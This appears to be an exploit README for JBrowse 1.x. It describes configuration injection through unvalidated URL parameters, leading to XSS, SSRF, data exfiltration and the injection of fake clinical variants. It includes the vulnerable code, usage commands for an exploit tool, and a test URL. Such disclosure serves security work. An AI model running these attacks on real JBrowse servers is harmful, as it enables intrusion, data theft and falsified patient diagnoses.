Share
## https://sploitus.com/exploit?id=870311AB-B092-54CB-8B3C-E76948587F36
# CVE-2026-XXXXX: JBrowse Configuration Injection via URL Parameters

## Overview

| Field | Value |
|-------|-------|
| **Product** | JBrowse |
| **Vendor** | GMOD |
| **Versions** | 1.0 through 1.16.11 (all 1.x versions) |
| **Type** | Code Injection (CWE-94) / XSS (CWE-79) / SSRF (CWE-918) |
| **CVSS 4.0** | 8.6 High |
| **Impact** | XSS / SSRF / Data Exfiltration / Clinical Data Manipulation |
| **bio.tools** | https://bio.tools/jbrowse |

## Vulnerability

JBrowse accepts multiple URL query parameters and passes them directly to `JSON.parse()` without any validation or sanitization:

```javascript
// src/JBrowse/main.js:85-106
if (queryParams.addFeatures) {
  config.stores.url.features = JSON.parse(queryParams.addFeatures)  // NO VALIDATION
}
if (queryParams.addTracks) {
  config.tracks = JSON.parse(queryParams.addTracks)                 // NO VALIDATION
}
if (queryParams.addBookmarks) {
  config.bookmarks.features = JSON.parse(queryParams.addBookmarks)  // NO VALIDATION
}
if (queryParams.addStores) {
  config.stores = JSON.parse(queryParams.addStores)                 // NO VALIDATION
}
```

Combined with CORS wildcard in `.htaccess`:
```apache
Header onsuccess set Access-Control-Allow-Origin *
```

## Impact

### 1. Cross-Site Scripting (XSS)
Inject HTML/JavaScript via track names, feature attributes, or bookmarks.

### 2. Server-Side Request Forgery (SSRF)
Configure stores to fetch internal resources (AWS metadata, internal APIs).

### 3. Clinical Data Manipulation
Inject fake pathogenic variants into clinical genomics JBrowse instances, potentially leading to incorrect patient diagnoses.

### 4. Data Exfiltration
Redirect data fetches to attacker-controlled servers.

## Usage

```bash
# Check if target is vulnerable
python3 exploit.py --target http://jbrowse.example.com --mode check

# Generate XSS payloads
python3 exploit.py --target http://jbrowse.example.com --mode xss

# Generate SSRF payloads
python3 exploit.py --target http://jbrowse.example.com --mode ssrf

# Clinical data phishing
python3 exploit.py --target http://jbrowse.example.com --mode phish

# Data exfiltration
python3 exploit.py --target http://jbrowse.example.com --mode exfil
```

### Quick Manual Test

Open in browser:
```
http://jbrowse.example.com/?data=sample_data/json/volvox&addTracks=[{"label":"test","key":"","type":"FeatureTrack","store":"url"}]
```

## Root Cause

1. **No input validation** on `addFeatures`, `addTracks`, `addStores`, `addBookmarks` URL params
2. **CORS wildcard** (`Access-Control-Allow-Origin: *`) allows cross-origin exploitation
3. **No CSP headers** to prevent inline script execution
4. **No authentication** on any JBrowse functionality

## Disclaimer

For **authorized security testing** and **educational purposes** only.

## License

MIT